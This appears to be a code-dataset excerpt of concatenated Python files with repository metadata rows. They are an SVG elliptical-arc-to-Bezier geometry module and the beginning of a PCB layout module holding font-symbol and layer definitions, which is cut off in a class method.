dependency_links=dependency_links,
author_email='[email protected]'
)
| gpl-2.0 | 2,096,139,193,927,262,200 | 33.225 | 96 | 0.680058 | false | 3.431078 | false | false | false |
vocky/svg-flask-test | arc.py | 1 | 6410 | # Copyright (c) 2005-2008, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Enthought, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from math import acos, sin, cos, hypot, ceil, sqrt, radians, degrees
import warnings
def bezier_arc(x1, y1, x2, y2, start_angle=0, extent=90):
""" Compute a cubic Bezier approximation of an elliptical arc.
(x1, y1) and (x2, y2) are the corners of the enclosing rectangle.
The coordinate system has coordinates that increase to the right and down.
    Angles, measured in degrees, start with 0 to the right (the positive X axis)
and increase counter-clockwise.
The arc extends from start_angle to start_angle+extent.
    I.e. start_angle=0 and extent=180 yields an open-side-down semi-circle.
The resulting coordinates are of the form (x1,y1, x2,y2, x3,y3, x4,y4)
such that the curve goes from (x1, y1) to (x4, y4) with (x2, y2) and
(x3, y3) as their respective Bezier control points.
"""
x1,y1, x2,y2 = min(x1,x2), max(y1,y2), max(x1,x2), min(y1,y2)
if abs(extent) <= 90:
frag_angle = float(extent)
nfrag = 1
else:
nfrag = int(ceil(abs(extent)/90.))
if nfrag == 0:
warnings.warn('Invalid value for extent: %r' % extent)
return []
frag_angle = float(extent) / nfrag
x_cen = (x1+x2)/2.
y_cen = (y1+y2)/2.
rx = (x2-x1)/2.
ry = (y2-y1)/2.
half_angle = radians(frag_angle) / 2
kappa = abs(4. / 3. * (1. - cos(half_angle)) / sin(half_angle))
if frag_angle < 0:
sign = -1
else:
sign = 1
point_list = []
for i in range(nfrag):
theta0 = radians(start_angle + i*frag_angle)
theta1 = radians(start_angle + (i+1)*frag_angle)
c0 = cos(theta0)
c1 = cos(theta1)
s0 = sin(theta0)
s1 = sin(theta1)
if frag_angle > 0:
signed_kappa = -kappa
else:
signed_kappa = kappa
point_list.append((x_cen + rx * c0,
y_cen - ry * s0,
x_cen + rx * (c0 + signed_kappa * s0),
y_cen - ry * (s0 - signed_kappa * c0),
x_cen + rx * (c1 - signed_kappa * s1),
y_cen - ry * (s1 + signed_kappa * c1),
x_cen + rx * c1,
y_cen - ry * s1))
return point_list
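# Usage sketch (illustrative only; 'path' and its move_to/curve_to methods are
# placeholders for whatever drawing API the caller uses). Each returned tuple
# is one cubic Bezier segment (x1,y1, x2,y2, x3,y3, x4,y4):
#
#   segments = bezier_arc(0, 0, 100, 100, start_angle=0, extent=180)
#   path.move_to(segments[0][0], segments[0][1])
#   for _, _, cx1, cy1, cx2, cy2, ex, ey in segments:
#       path.curve_to(cx1, cy1, cx2, cy2, ex, ey)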
def angle(x1, y1, x2, y2):
""" The angle in degrees between two vectors.
"""
sign = 1.0
usign = (x1*y2 - y1*x2)
if usign < 0:
sign = -1.0
num = x1*x2 + y1*y2
den = hypot(x1,y1) * hypot(x2,y2)
ratio = min(max(num/den, -1.0), 1.0)
return sign * degrees(acos(ratio))
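# Worked examples (by direct substitution): the signed angle from +X to +Y is
# a counter-clockwise quarter turn, from +X to -Y a clockwise one:
#   angle(1, 0, 0, 1)   ->  90.0
#   angle(1, 0, 0, -1)  -> -90.0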
def transform_from_local(xp, yp, cphi, sphi, mx, my):
""" Transform from the local frame to absolute space.
"""
x = xp * cphi - yp * sphi + mx
y = xp * sphi + yp * cphi + my
return (x,y)
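# Example: with cphi=1, sphi=0 (no rotation) the transform is a pure
# translation by (mx, my):
#   transform_from_local(1.0, 2.0, 1.0, 0.0, 10.0, 20.0)  ->  (11.0, 22.0)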
def elliptical_arc_to(x1, y1, rx, ry, phi, large_arc_flag, sweep_flag, x2, y2):
""" An elliptical arc approximated with Bezier curves or a line segment.
Algorithm taken from the SVG 1.1 Implementation Notes:
http://www.w3.org/TR/SVG/implnote.html#ArcImplementationNotes
"""
# Basic normalization.
rx = abs(rx)
ry = abs(ry)
phi = phi % 360
# Check for certain special cases.
if x1==x2 and y1==y2:
# Omit the arc.
# x1 and y1 can obviously remain the same for the next segment.
return []
if rx == 0 or ry == 0:
# Line segment.
return [(x2,y2)]
rphi = radians(phi)
cphi = cos(rphi)
sphi = sin(rphi)
# Step 1: Rotate to the local coordinates.
dx = 0.5*(x1 - x2)
dy = 0.5*(y1 - y2)
x1p = cphi * dx + sphi * dy
y1p = -sphi * dx + cphi * dy
# Ensure that rx and ry are large enough to have a unique solution.
lam = (x1p/rx)**2 + (y1p/ry)**2
if lam > 1.0:
scale = sqrt(lam)
rx *= scale
ry *= scale
# Step 2: Solve for the center in the local coordinates.
num = max((rx*ry)**2 - (rx*y1p)**2 - (ry*x1p)**2, 0.0)
den = ((rx*y1p)**2 + (ry*x1p)**2)
a = sqrt(num / den)
cxp = a * rx*y1p/ry
cyp = -a * ry*x1p/rx
if large_arc_flag == sweep_flag:
cxp = -cxp
cyp = -cyp
# Step 3: Transform back.
mx = 0.5*(x1+x2)
my = 0.5*(y1+y2)
# Step 4: Compute the start angle and the angular extent of the arc.
# Note that theta1 is local to the phi-rotated coordinate space.
dx = (x1p-cxp) / rx
dy = (y1p-cyp) / ry
dx2 = (-x1p-cxp) / rx
dy2 = (-y1p-cyp) / ry
theta1 = angle(1,0,dx,dy)
dtheta = angle(dx,dy,dx2,dy2)
if not sweep_flag and dtheta > 0:
dtheta -= 360
elif sweep_flag and dtheta < 0:
dtheta += 360
# Step 5: Break it apart into Bezier arcs.
p = []
control_points = bezier_arc(cxp-rx,cyp-ry,cxp+rx,cyp+ry, theta1, dtheta)
for x1p,y1p, x2p,y2p, x3p,y3p, x4p,y4p in control_points:
# Transform them back to asbolute space.
p.append((
transform_from_local(x2p,y2p,cphi,sphi,mx,my) +
transform_from_local(x3p,y3p,cphi,sphi,mx,my) +
transform_from_local(x4p,y4p,cphi,sphi,mx,my)
))
return p | apache-2.0 | -8,595,482,971,694,962,000 | 33.467742 | 97 | 0.625897 | false | 2.914961 | false | false | false |
32bitmicro/EDA | python/eda/eda/pcb.py | 1 | 45843 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Paweł Wodnicki
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the 32bitmicro nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL Paweł Wodnicki BE LIABLE FOR ANY
#DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from edautils import *
from eda import *
pcb_symbols= """
Symbol(' ' 18)
(
)
Symbol('!' 12)
(
SymbolLine(0 35 0 40 8)
SymbolLine(0 0 0 25 8)
)
Symbol('"' 12)
(
SymbolLine(0 0 0 10 8)
SymbolLine(10 0 10 10 8)
)
Symbol('#' 12)
(
SymbolLine(0 25 20 25 8)
SymbolLine(0 15 20 15 8)
SymbolLine(15 10 15 30 8)
SymbolLine(5 10 5 30 8)
)
Symbol('$' 12)
(
SymbolLine(15 5 20 10 8)
SymbolLine(5 5 15 5 8)
SymbolLine(0 10 5 5 8)
SymbolLine(0 10 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 30 8)
SymbolLine(15 35 20 30 8)
SymbolLine(5 35 15 35 8)
SymbolLine(0 30 5 35 8)
SymbolLine(10 0 10 40 8)
)
Symbol('%' 12)
(
SymbolLine(0 5 0 10 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 10 0 8)
SymbolLine(10 0 15 5 8)
SymbolLine(15 5 15 10 8)
SymbolLine(10 15 15 10 8)
SymbolLine(5 15 10 15 8)
SymbolLine(0 10 5 15 8)
SymbolLine(0 40 40 0 8)
SymbolLine(35 40 40 35 8)
SymbolLine(40 30 40 35 8)
SymbolLine(35 25 40 30 8)
SymbolLine(30 25 35 25 8)
SymbolLine(25 30 30 25 8)
SymbolLine(25 30 25 35 8)
SymbolLine(25 35 30 40 8)
SymbolLine(30 40 35 40 8)
)
Symbol('&' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 25 15 10 8)
SymbolLine(5 40 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(0 15 25 40 8)
SymbolLine(5 0 10 0 8)
SymbolLine(10 0 15 5 8)
SymbolLine(15 5 15 10 8)
SymbolLine(0 25 0 35 8)
)
Symbol(''' 12)
(
SymbolLine(0 10 10 0 8)
)
Symbol('(' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
)
Symbol(')' 12)
(
SymbolLine(0 0 5 5 8)
SymbolLine(5 5 5 35 8)
SymbolLine(0 40 5 35 8)
)
Symbol('*' 12)
(
SymbolLine(0 10 20 30 8)
SymbolLine(0 30 20 10 8)
SymbolLine(0 20 20 20 8)
SymbolLine(10 10 10 30 8)
)
Symbol('+' 12)
(
SymbolLine(0 20 20 20 8)
SymbolLine(10 10 10 30 8)
)
Symbol(',' 12)
(
SymbolLine(0 50 10 40 8)
)
Symbol('-' 12)
(
SymbolLine(0 20 20 20 8)
)
Symbol('.' 12)
(
SymbolLine(0 40 5 40 8)
)
Symbol('/' 12)
(
SymbolLine(0 35 30 5 8)
)
Symbol('0' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 30 20 10 8)
)
Symbol('1' 12)
(
SymbolLine(5 40 15 40 8)
SymbolLine(10 0 10 40 8)
SymbolLine(0 10 10 0 8)
)
Symbol('2' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(0 40 25 15 8)
SymbolLine(0 40 25 40 8)
)
Symbol('3' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 20 20 20 8)
)
Symbol('4' 12)
(
SymbolLine(0 20 20 0 8)
SymbolLine(0 20 25 20 8)
SymbolLine(20 0 20 40 8)
)
Symbol('5' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(0 0 0 20 8)
SymbolLine(0 20 5 15 8)
SymbolLine(5 15 15 15 8)
SymbolLine(15 15 20 20 8)
SymbolLine(20 20 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('6' 12)
(
SymbolLine(15 0 20 5 8)
SymbolLine(5 0 15 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(15 20 20 25 8)
SymbolLine(0 20 15 20 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 25 20 35 8)
)
Symbol('7' 12)
(
SymbolLine(0 40 25 15 8)
SymbolLine(25 0 25 15 8)
SymbolLine(0 0 25 0 8)
)
Symbol('8' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 15 5 20 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 15 8)
SymbolLine(15 20 20 15 8)
)
Symbol('9' 12)
(
SymbolLine(0 40 20 20 8)
SymbolLine(20 5 20 20 8)
SymbolLine(15 0 20 5 8)
SymbolLine(5 0 15 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 20 20 8)
)
Symbol(':' 12)
(
SymbolLine(0 15 5 15 8)
SymbolLine(0 25 5 25 8)
)
Symbol(';' 12)
(
SymbolLine(0 40 10 30 8)
SymbolLine(10 15 10 20 8)
)
Symbol('<' 12)
(
SymbolLine(0 20 10 10 8)
SymbolLine(0 20 10 30 8)
)
Symbol('=' 12)
(
SymbolLine(0 15 20 15 8)
SymbolLine(0 25 20 25 8)
)
Symbol('>' 12)
(
SymbolLine(0 10 10 20 8)
SymbolLine(0 30 10 20 8)
)
Symbol('?' 12)
(
SymbolLine(10 20 10 25 8)
SymbolLine(10 35 10 40 8)
SymbolLine(0 5 0 10 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 10 8)
SymbolLine(10 20 20 10 8)
)
Symbol('A' 12)
(
SymbolLine(0 5 0 40 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 40 8)
SymbolLine(0 20 25 20 8)
)
Symbol('B' 12)
(
SymbolLine(0 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 20 25 25 8)
SymbolLine(5 20 20 20 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
)
Symbol('C' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
)
Symbol('D' 12)
(
SymbolLine(5 0 5 40 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(0 40 20 40 8)
SymbolLine(0 0 20 0 8)
)
Symbol('E' 12)
(
SymbolLine(0 20 15 20 8)
SymbolLine(0 40 20 40 8)
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 20 0 8)
)
Symbol('F' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(0 20 15 20 8)
)
Symbol('G' 12)
(
SymbolLine(20 0 25 5 8)
SymbolLine(5 0 20 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 20 25 25 8)
SymbolLine(10 20 20 20 8)
)
Symbol('H' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(25 0 25 40 8)
SymbolLine(0 20 25 20 8)
)
Symbol('I' 12)
(
SymbolLine(0 0 10 0 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 40 10 40 8)
)
Symbol('J' 12)
(
SymbolLine(0 0 15 0 8)
SymbolLine(15 0 15 35 8)
SymbolLine(10 40 15 35 8)
SymbolLine(5 40 10 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('K' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 20 20 0 8)
SymbolLine(0 20 20 40 8)
)
Symbol('L' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 20 40 8)
)
Symbol('M' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 15 15 8)
SymbolLine(15 15 30 0 8)
SymbolLine(30 0 30 40 8)
)
Symbol('N' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 25 30 8)
SymbolLine(25 0 25 40 8)
)
Symbol('O' 12)
(
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('P' 12)
(
SymbolLine(5 0 5 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
SymbolLine(5 20 20 20 8)
)
Symbol('Q' 12)
(
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(10 30 20 40 8)
)
Symbol('R' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
SymbolLine(5 20 20 20 8)
SymbolLine(5 0 5 40 8)
SymbolLine(5 20 25 40 8)
)
Symbol('S' 12)
(
SymbolLine(20 0 25 5 8)
SymbolLine(5 0 20 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('T' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(10 0 10 40 8)
)
Symbol('U' 12)
(
SymbolLine(0 0 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 0 20 35 8)
)
Symbol('V' 12)
(
SymbolLine(0 0 0 30 8)
SymbolLine(0 30 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(20 0 20 30 8)
)
Symbol('W' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 15 25 8)
SymbolLine(15 25 30 40 8)
SymbolLine(30 0 30 40 8)
)
Symbol('X' 12)
(
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 25 30 8)
SymbolLine(25 30 25 40 8)
SymbolLine(0 30 0 40 8)
SymbolLine(0 30 25 5 8)
SymbolLine(25 0 25 5 8)
)
Symbol('Y' 12)
(
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 10 15 8)
SymbolLine(10 15 20 5 8)
SymbolLine(20 0 20 5 8)
SymbolLine(10 15 10 40 8)
)
Symbol('Z' 12)
(
SymbolLine(0 0 25 0 8)
SymbolLine(25 0 25 5 8)
SymbolLine(0 30 25 5 8)
SymbolLine(0 30 0 40 8)
SymbolLine(0 40 25 40 8)
)
Symbol('[' 12)
(
SymbolLine(0 0 5 0 8)
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 5 40 8)
)
Symbol('\' 12)
(
SymbolLine(0 5 30 35 8)
)
Symbol(']' 12)
(
SymbolLine(0 0 5 0 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 40 5 40 8)
)
Symbol('^' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 10 5 8)
)
Symbol('_' 12)
(
SymbolLine(0 40 20 40 8)
)
Symbol('a' 12)
(
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(20 20 20 35 8)
SymbolLine(20 35 25 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('b' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
)
Symbol('c' 12)
(
SymbolLine(5 20 20 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 20 40 8)
)
Symbol('d' 12)
(
SymbolLine(20 0 20 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
)
Symbol('e' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(0 30 20 30 8)
SymbolLine(20 30 20 25 8)
)
Symbol('f' 10)
(
SymbolLine(5 5 5 40 8)
SymbolLine(5 5 10 0 8)
SymbolLine(10 0 15 0 8)
SymbolLine(0 20 10 20 8)
)
Symbol('g' 12)
(
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(0 50 5 55 8)
SymbolLine(5 55 15 55 8)
SymbolLine(15 55 20 50 8)
SymbolLine(20 20 20 50 8)
)
Symbol('h' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
)
Symbol('i' 10)
(
SymbolLine(0 10 0 15 8)
SymbolLine(0 25 0 40 8)
)
Symbol('j' 10)
(
SymbolLine(5 10 5 15 8)
SymbolLine(5 25 5 50 8)
SymbolLine(0 55 5 50 8)
)
Symbol('k' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 25 15 40 8)
SymbolLine(0 25 10 15 8)
)
Symbol('l' 10)
(
SymbolLine(0 0 0 35 8)
SymbolLine(0 35 5 40 8)
)
Symbol('m' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
SymbolLine(20 25 25 20 8)
SymbolLine(25 20 30 20 8)
SymbolLine(30 20 35 25 8)
SymbolLine(35 25 35 40 8)
SymbolLine(0 20 5 25 8)
)
Symbol('n' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
SymbolLine(0 20 5 25 8)
)
Symbol('o' 12)
(
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('p' 12)
(
SymbolLine(5 25 5 55 8)
SymbolLine(0 20 5 25 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(10 40 20 40 8)
SymbolLine(5 35 10 40 8)
)
Symbol('q' 12)
(
SymbolLine(20 25 20 55 8)
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('r' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 20 20 8)
SymbolLine(0 20 5 25 8)
)
Symbol('s' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(20 30 25 35 8)
SymbolLine(5 30 20 30 8)
SymbolLine(0 25 5 30 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(0 35 5 40 8)
)
Symbol('t' 10)
(
SymbolLine(5 0 5 35 8)
SymbolLine(5 35 10 40 8)
SymbolLine(0 15 10 15 8)
)
Symbol('u' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 20 20 35 8)
)
Symbol('v' 12)
(
SymbolLine(0 20 0 30 8)
SymbolLine(0 30 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(20 20 20 30 8)
)
Symbol('w' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 10 40 8)
SymbolLine(10 40 15 35 8)
SymbolLine(15 20 15 35 8)
SymbolLine(15 35 20 40 8)
SymbolLine(20 40 25 40 8)
SymbolLine(25 40 30 35 8)
SymbolLine(30 20 30 35 8)
)
Symbol('x' 12)
(
SymbolLine(0 20 20 40 8)
SymbolLine(0 40 20 20 8)
)
Symbol('y' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(20 20 20 50 8)
SymbolLine(15 55 20 50 8)
SymbolLine(5 55 15 55 8)
SymbolLine(0 50 5 55 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('z' 12)
(
SymbolLine(0 20 20 20 8)
SymbolLine(0 40 20 20 8)
SymbolLine(0 40 20 40 8)
)
Symbol('{' 12)
(
SymbolLine(5 5 10 0 8)
SymbolLine(5 5 5 15 8)
SymbolLine(0 20 5 15 8)
SymbolLine(0 20 5 25 8)
SymbolLine(5 25 5 35 8)
SymbolLine(5 35 10 40 8)
)
Symbol('|' 12)
(
SymbolLine(0 0 0 40 8)
)
Symbol('}' 12)
(
SymbolLine(0 0 5 5 8)
SymbolLine(5 5 5 15 8)
SymbolLine(5 15 10 20 8)
SymbolLine(5 25 10 20 8)
SymbolLine(5 25 5 35 8)
SymbolLine(0 40 5 35 8)
)
Symbol('~' 12)
(
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 10 20 8)
SymbolLine(10 20 15 25 8)
SymbolLine(15 25 20 25 8)
SymbolLine(20 25 25 20 8)
)
"""
pcb_layers = """
Layer(1 "solder")
(
)
Layer(2 "component")
(
)
Layer(3 "GND")
(
)
Layer(4 "power")
(
)
Layer(5 "signal1")
(
)
Layer(6 "signal2")
(
)
Layer(7 "unused")
(
)
Layer(8 "unused")
(
)
Layer(9 "silk")
(
)
Layer(10 "silk")
(
)
"""
class CPCB:
" PCB class "
def __init__(self, sch=None,brd=None):
self.name=""
self.sch=sch
self.brd=brd
self.script_path=""
def addLayers(self):
# These layers have to be added in the board
# self.brd.addLayer(CLayer("solder",1)) # bottom orientation
# self.brd.addLayer(CLayer("component",2))
# these layers are already added
## self.brd.addLayer(CLayer("GND",3))
## self.brd.addLayer(CLayer("VCC",4))
## self.brd.addLayer(CLayer("blksolder",5)) # bottom orientation
## self.brd.addLayer(CLayer("blkcomponent",6))
